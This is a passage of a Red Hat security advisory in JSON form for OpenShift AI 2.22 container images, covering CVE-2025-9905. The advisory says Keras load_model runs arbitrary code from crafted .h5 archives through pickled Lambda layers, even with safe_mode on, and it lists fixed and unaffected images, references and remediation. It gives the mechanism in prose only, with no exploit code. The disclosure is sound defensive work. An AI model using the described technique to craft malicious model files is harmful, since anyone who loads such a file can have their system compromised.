"name": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le"
},
"product_reference": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x"
},
"product_reference": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64"
},
"product_reference": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-9905",
"cwe": {
"id": "CWE-913",
"name": "Improper Control of Dynamically-Managed Code Resources"
},
"discovery_date": "2025-09-19T09:00:54.801987+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2396645"
}
],
"notes": [
{
"category": "description",
"text": "The Keras Model.load_model\u00a0method can be exploited to achieve arbitrary code execution, even with safe_mode=True.\n\nOne can create a specially crafted .h5/.hdf5\u00a0model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.\n\nThis is achieved by crafting a special .h5\u00a0archive file that uses the Lambda\u00a0layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True\u00a0option is not honored when reading .h5\u00a0archives.\n\nNote that the .h5/.hdf5\u00a0format is a legacy format supported by Keras 3 for backwards compatibility.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "keras: Arbitary Code execution in Keras load_model()",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-9905"
},
{
"category": "external",
"summary": "RHBZ#2396645",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2396645"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-9905",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9905"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-9905",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9905"
},
{
"category": "external",
"summary": "https://github.com/keras-team/keras/pull/21602",
"url": "https://github.com/keras-team/keras/pull/21602"
},
{
"category": "external",
"summary": "https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv",
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv"
}
],
"release_date": "2025-09-19T08:16:44.772000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
